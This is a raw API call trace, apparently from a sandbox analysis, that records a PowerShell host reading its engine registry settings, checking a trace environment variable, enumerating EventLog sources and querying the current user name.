	[0301.192] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.192] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x35b1e0, lpcchValueName=0x12d078, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d078, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.192] CoTaskMemFree (pv=0x35b1e0) 
	[0301.192] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.192] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x35b1e0, lpcchValueName=0x12d078, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d078, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.192] CoTaskMemFree (pv=0x35b1e0) 
	[0301.192] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.192] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x35b1e0, lpcchValueName=0x12d078, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d078, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0301.192] CoTaskMemFree (pv=0x35b1e0) 
	[0301.192] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d05c, lpData=0x0, lpcbData=0x12d058*=0x0 | out: lpType=0x12d05c*=0x1, lpData=0x0, lpcbData=0x12d058*=0x8) returned 0x0
	[0301.192] CoTaskMemAlloc (cb=0xc) returned 0x3c0e90
	[0301.192] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d02c, lpData=0x3c0e90, lpcbData=0x12d028*=0x8 | out: lpType=0x12d02c*=0x1, lpData="2.0", lpcbData=0x12d028*=0x8) returned 0x0
	[0301.192] CoTaskMemFree (pv=0x3c0e90) 
	[0301.193] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0301.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.194] CoTaskMemFree (pv=0x3a7210) 
	[0301.198] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0301.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0301.198] CoTaskMemFree (pv=0x3a7210) 
	[0301.203] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0f8 | out: phkResult=0x12d0f8*=0x308) returned 0x0
	[0301.205] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d06c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d068, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d06c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d068*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.205] CoTaskMemFree (pv=0x0) 
	[0301.206] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.206] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x0, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.206] CoTaskMemFree (pv=0x35b1e0) 
	[0301.206] CoTaskMemFree (pv=0x0) 
	[0301.206] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.206] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x1, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.206] CoTaskMemFree (pv=0x35b1e0) 
	[0301.206] CoTaskMemFree (pv=0x0) 
	[0301.206] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.206] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x2, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.206] CoTaskMemFree (pv=0x35b1e0) 
	[0301.206] CoTaskMemFree (pv=0x0) 
	[0301.206] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x3, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x4, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x5, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x6, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x7, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.207] RegEnumKeyExW (in: hKey=0x308, dwIndex=0x8, lpName=0x35b1e0, lpcchName=0x12d0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.207] CoTaskMemFree (pv=0x35b1e0) 
	[0301.207] CoTaskMemFree (pv=0x0) 
	[0301.207] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x30c) returned 0x0
	[0301.207] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.208] RegOpenKeyExW (in: hKey=0x308, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x310) returned 0x0
	[0301.208] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.489] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x324) returned 0x0
	[0301.489] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.489] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x338) returned 0x0
	[0301.489] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.489] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x33c) returned 0x0
	[0301.489] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.489] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x340) returned 0x0
	[0301.489] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.490] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x344) returned 0x0
	[0301.490] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.490] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x348) returned 0x0
	[0301.490] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x0) returned 0x2
	[0301.490] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x34c) returned 0x0
	[0301.490] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d158 | out: phkResult=0x12d158*=0x350) returned 0x0
	[0301.490] RegCloseKey (hKey=0x350) returned 0x0
	[0301.490] RegCloseKey (hKey=0x308) returned 0x0
	[0301.491] RegCloseKey (hKey=0x34c) returned 0x0
	[0301.498] CoTaskMemAlloc (cb=0x804) returned 0x1b7d38a0
	[0301.499] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7d38a0, nSize=0x12d368 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d368) returned 0x1
	[0301.499] CoTaskMemFree (pv=0x1b7d38a0) 
	[0301.501] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.501] GetUserNameW (in: lpBuffer=0x35b1e0, pcbBuffer=0x12d3a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3a8) returned 1
	[0301.501] CoTaskMemFree (pv=0x35b1e0) 
	[0301.514] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0a8 | out: phkResult=0x12d0a8*=0x354) returned 0x0
	[0301.514] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d01c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d018, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d01c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d018*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.514] CoTaskMemFree (pv=0x0) 
	[0301.514] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.514] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.515] CoTaskMemFree (pv=0x35b1e0) 
	[0301.515] CoTaskMemFree (pv=0x0) 
	[0301.515] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.515] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.516] CoTaskMemFree (pv=0x35b1e0) 
	[0301.516] CoTaskMemFree (pv=0x0) 
	[0301.516] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.516] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.516] CoTaskMemFree (pv=0x35b1e0) 
	[0301.516] CoTaskMemFree (pv=0x0) 
	[0301.516] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.516] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.516] CoTaskMemFree (pv=0x35b1e0) 
	[0301.516] CoTaskMemFree (pv=0x0) 
	[0301.516] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x358) returned 0x0
	[0301.516] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.516] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x35c) returned 0x0
	[0301.516] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.516] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x360) returned 0x0
	[0301.516] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.517] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x364) returned 0x0
	[0301.517] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.517] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x368) returned 0x0
	[0301.517] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.517] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x36c) returned 0x0
	[0301.517] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.517] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x370) returned 0x0
	[0301.517] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.517] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x374) returned 0x0
	[0301.517] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.518] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x378) returned 0x0
	[0301.518] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x37c) returned 0x0
	[0301.518] RegCloseKey (hKey=0x37c) returned 0x0
	[0301.518] RegCloseKey (hKey=0x354) returned 0x0
	[0301.518] RegCloseKey (hKey=0x378) returned 0x0
	[0301.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0a8 | out: phkResult=0x12d0a8*=0x378) returned 0x0
	[0301.519] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d01c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d018, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d01c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d018*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.519] CoTaskMemFree (pv=0x0) 
	[0301.519] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.519] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.519] CoTaskMemFree (pv=0x35b1e0) 
	[0301.519] CoTaskMemFree (pv=0x0) 
	[0301.519] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.519] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.519] CoTaskMemFree (pv=0x35b1e0) 
	[0301.519] CoTaskMemFree (pv=0x0) 
	[0301.519] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.519] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.519] CoTaskMemFree (pv=0x35b1e0) 
	[0301.519] CoTaskMemFree (pv=0x0) 
	[0301.519] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.519] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.520] CoTaskMemFree (pv=0x35b1e0) 
	[0301.520] CoTaskMemFree (pv=0x0) 
	[0301.520] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.520] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.520] CoTaskMemFree (pv=0x35b1e0) 
	[0301.520] CoTaskMemFree (pv=0x0) 
	[0301.520] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.520] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.520] CoTaskMemFree (pv=0x35b1e0) 
	[0301.520] CoTaskMemFree (pv=0x0) 
	[0301.520] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.520] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.521] CoTaskMemFree (pv=0x35b1e0) 
	[0301.521] CoTaskMemFree (pv=0x0) 
	[0301.521] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.521] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.521] CoTaskMemFree (pv=0x35b1e0) 
	[0301.521] CoTaskMemFree (pv=0x0) 
	[0301.521] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0301.521] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x35b1e0, lpcchName=0x12d0a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.521] CoTaskMemFree (pv=0x35b1e0) 
	[0301.521] CoTaskMemFree (pv=0x0) 
	[0301.521] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x354) returned 0x0
	[0301.521] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.521] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x37c) returned 0x0
	[0301.521] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.521] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x380) returned 0x0
	[0301.522] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x0) returned 0x2
	[0301.522] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x384) returned 0x0
